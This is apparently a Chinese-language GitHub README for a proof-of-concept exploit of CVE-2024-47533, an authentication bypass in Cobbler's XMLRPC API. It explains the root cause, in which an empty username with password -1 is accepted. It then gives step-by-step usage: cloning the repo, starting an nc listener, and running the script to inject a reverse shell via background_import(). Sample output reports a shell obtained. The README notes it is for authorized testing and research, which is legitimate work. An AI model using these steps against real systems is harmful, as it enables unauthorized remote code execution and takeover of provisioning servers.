本仓库包含 CVE-2024-47533 的 概念验证(PoC)漏洞利用代码,
该漏洞是 Cobbler XMLRPC API 中的一个严重认证绕过漏洞,可导致 未授权远程代码执行(RCE)。
漏洞利用程序通过 XMLRPC API 的 login() 方法缺陷绕过认证,并借助 background_import() 注入反向 Shell 命令。
此工具仅用于 教育、研究及授权的渗透测试。
请 勿 在未拥有或未经明确书面许可的系统上使用。
作者对滥用或造成的损害 不承担任何责任。
根因:
utils.get_shared_secret() 由于在二进制模式下读取文件并使用了编码,错误地返回 -1,从而允许使用空用户名和 -1 作为密码进行认证。
影响:
攻击者可以:
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
在攻击机上:
nc -lvnp 4444
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
示例:
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
.
├── CVE-2024-47533.py # 反向 Shell 漏洞利用脚本
└── README.md # 文档
[*] 目标:http://192.168.1.50:25151/RPC2
[*] 监听器:192.168.1.100:4444
[*] 载荷:bash
[*] 正在连接 Cobbler...
[*] 正在认证...
[*] 正在执行漏洞利用...
[+] 漏洞利用已发送!获取到 Shell 🔥。
00xCanelo
GitHub 主页